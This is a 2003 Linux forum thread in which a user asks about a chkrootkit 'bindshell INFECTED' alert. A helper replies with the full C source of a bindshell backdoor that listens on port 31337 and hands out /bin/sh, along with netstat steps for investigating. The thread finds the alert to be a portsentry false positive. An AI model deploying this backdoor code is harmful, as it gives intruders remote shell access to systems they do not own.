View previous topic :: View next topic |
Author |
Message |
Gent n00b
Joined: 24 May 2003 Posts: 6
|
Posted: Wed May 28, 2003 2:03 am Post subject: Hacked Maybe??? |
|
|
I'll admit that I don't know that much about security, though I am trying to learn more. I recently installed chkrootkit mainly because I was just curious. When I ran it I came accross this:
Code: |
ROOTDIR is `/'
Checking `amd'... not found
Checking `basename'... not infected
Checking `biff'... not found
Checking `chfn'... not infected
Checking `chsh'... not infected
Checking `cron'... not infected
Checking `date'... not infected
Checking `du'... not infected
Checking `dirname'... not infected
Checking `echo'... not infected
Checking `egrep'... not infected
Checking `env'... not infected
Checking `find'... not infected
Checking `fingerd'... not found
Checking `gpm'... not infected
Checking `grep'... not infected
Checking `hdparm'... not infected
Checking `su'... not infected
Checking `ifconfig'... not infected
Checking `inetd'... not infected
Checking `inetdconf'... not found
Checking `identd'... not found
Checking `killall'... not infected
Checking `ldsopreload'... not infected
Checking `login'... not infected
Checking `ls'... not infected
Checking `lsof'... not found
Checking `mail'... not found
Checking `mingetty'... not found
Checking `netstat'... not infected
Checking `named'... not found
Checking `passwd'... not infected
Checking `pidof'... not infected
Checking `pop2'... not found
Checking `pop3'... not found
Checking `ps'... not infected
Checking `pstree'... not infected
Checking `rpcinfo'... not infected
Checking `rlogind'... not found
Checking `rshd'... not found
Checking `slogin'... not infected
Checking `sendmail'... not infected
Checking `sshd'... not infected
Checking `syslogd'... not infected
Checking `tar'... not infected
Checking `tcpd'... not infected
Checking `top'... not infected
Checking `telnetd'... not found
Checking `timed'... not found
Checking `traceroute'... not found
Checking `w'... not infected
Checking `write'... not infected
Checking `aliens'... no suspect files
Searching for sniffer's logs, it may take a while... nothing found
Searching for HiDrootkit's default dir... nothing found
Searching for t0rn's default files and dirs... nothing found
Searching for t0rn's v8 defaults... nothing found
Searching for Lion Worm default files and dirs... nothing found
Searching for RSHA's default files and dir... nothing found
Searching for RH-Sharpe's default files... nothing found
Searching for Ambient's rootkit (ark) default files and dirs... nothing found
Searching for suspicious files and dirs, it may take a while...
/usr/lib/.keep /usr/lib/perl5/5.8.0/i586-linux/auto/ExtUtils/MakeMaker/.packlist /usr/lib/perl5/5.8.0/i586-linux/auto/Safe/.packlist /usr/lib/perl5/5.8.0/i586-linux/.packlist /usr/lib/perl5/site_perl/5.8.0/i586-linux/auto/Net/SSLeay/.packlist /usr/lib/twin/.twinrc /usr/lib/twin/.twenvrc.sh /lib/.keep /lib/dev-state/.keep
Searching for LPD Worm files and dirs... nothing found
Searching for Ramen Worm files and dirs... nothing found
Searching for Maniac files and dirs... nothing found
Searching for RK17 files and dirs... nothing found
Searching for Ducoci rootkit... nothing found
Searching for Adore Worm... nothing found
Searching for ShitC Worm... nothing found
Searching for Omega Worm... nothing found
Searching for Sadmind/IIS Worm... nothing found
Searching for MonKit... nothing found
Searching for Showtee... nothing found
Searching for OpticKit... nothing found
Searching for T.R.K... nothing found
Searching for Mithra... nothing found
Searching for OBSD rk v1... nothing found
Searching for anomalies in shell history files... nothing found
Checking `asp'... not infected
Checking `bindshell'... INFECTED (PORTS: 1524 31337)
Checking `lkm'... nothing detected
Checking `rexedcs'... not found
Checking `sniffer'...
eth0 is not promisc
eth1 is not promisc
Checking `wted'... nothing deleted
Checking `scalper'... not infected
Checking `slapper'... not infected
Checking `z2'...
nothing deleted
|
just what exactly is bindshell anyway and what does it mean that it is infected. |
|
Back to top |
|
|
dma Guru
Joined: 31 Jan 2003 Posts: 437 Location: Charlotte, NC, USA
|
Posted: Wed May 28, 2003 2:29 am Post subject: |
|
|
Here's "bindshell" (bind a shell to a port):
http://home.tiscali.be/tusca/intru2/grp6/bindshell.html
Code: | /* quick thingy... bind a shell to a socket... defaults to port 31337 */
/* code by pluvius@io.org */
/* don't forget.. when you connect to the port.. commands are like: */
/* "ls -l;" or "exit;" (don't forget the ';') */
#define PORT 31337
#include
#include
#include
#include
#include
int soc_des, soc_cli, soc_rc, soc_len, server_pid, cli_pid;
struct sockaddr_in serv_addr;
struct sockaddr_in client_addr;
int main ()
{
soc_des = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if (soc_des == -1)
exit(-1);
bzero((char *) &serv_addr, sizeof(serv_addr));
serv_addr.sin_family = AF_INET;
serv_addr.sin_addr.s_addr = htonl(INADDR_ANY);
serv_addr.sin_port = htons(PORT);
soc_rc = bind(soc_des, (struct sockaddr *) &serv_addr, sizeof(serv_addr));
if (soc_rc != 0)
exit(-1);
if (fork() != 0)
exit(0);
setpgrp();
signal(SIGHUP, SIG_IGN);
if (fork() != 0)
exit(0);
soc_rc = listen(soc_des, 5);
if (soc_rc != 0)
exit(0);
while (1) {
soc_len = sizeof(client_addr);
soc_cli = accept(soc_des, (struct sockaddr *) &client_addr, &soc_len);
if (soc_cli < 0)
exit(0);
cli_pid = getpid();
server_pid = fork();
if (server_pid != 0) {
dup2(soc_cli,0);
dup2(soc_cli,1);
dup2(soc_cli,2);
execl("/bin/sh","sh",(char *)0);
close(soc_cli);
exit(0);
}
close(soc_cli);
}
}
|
(they removed the #include filenames to prevent kiddie abuse.)
This is *BAD NEWS*. Find out which user is running it, possibly using:
or:
Code: | netstat -epl -A inet |
(although this won't work if they replaced netstat/lsof or loaded a kernel module that hides the connections.)
Find out where the bindshell is located and who owns the bindshell file. Try to determine when it was planted. If it is running as root then you might want to rebuild from scratch. YOU CAN'T TRUST ANYTHING. |
|
Back to top |
|
|
Gent n00b
Joined: 24 May 2003 Posts: 6
|
Posted: Wed May 28, 2003 2:44 am Post subject: |
|
|
output from
Code: |
netstat -epl -A inet
|
Code: |
tcp 0 0 *:31337 *:* LISTEN root 3699 2146/portsentry
udp 0 0 *:31337 *:* root 3755 2148/portsentry
|
|
|
Back to top |
|
|
dma Guru
Joined: 31 Jan 2003 Posts: 437 Location: Charlotte, NC, USA
|
Posted: Wed May 28, 2003 2:57 am Post subject: |
|
|
http://www.chkrootkit.org/
Look at #7:
Quote: | 7. I'm running PortSentry/klaxon. What's wrong with the bindshell test?
If you're running PortSentry/klaxon or another program that binds itself to unused ports probably chkrootkit will give you a false positive on the bindshell test (ports 114/tcp, 465/tcp, 511/tcp, 1008/tcp, 1524/tcp, 1999/tcp, 3879/tcp, 4369/tcp, 5665/tcp, 10008/tcp, 12321/tcp, 23132/tcp, 27374/tcp, 29364/tcp, 31336/tcp, 31337/tcp, 45454/tcp, 47017/tcp, 47889/tcp, 60001/tcp).
|
You seem to be safe (so long as portsentry isn't compromised). |
|
Back to top |
|
|
Gent n00b
Joined: 24 May 2003 Posts: 6
|
Posted: Wed May 28, 2003 2:59 am Post subject: |
|
|
Well I just did a search for bindshell and nothing came back. I'm just wondering if the portsentry is supposed to do this. |
|
Back to top |
|
|
Gent n00b
Joined: 24 May 2003 Posts: 6
|
Posted: Wed May 28, 2003 3:03 am Post subject: |
|
|
Well I just got through with a search on the Net and found that when you run Portsenty chkrootkit will give a false alert. In the future I'll know to ignore this or at least not jump to conclusions. Anyways thanks for the help. |
|
Back to top |
|
|
|
|
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum
|
|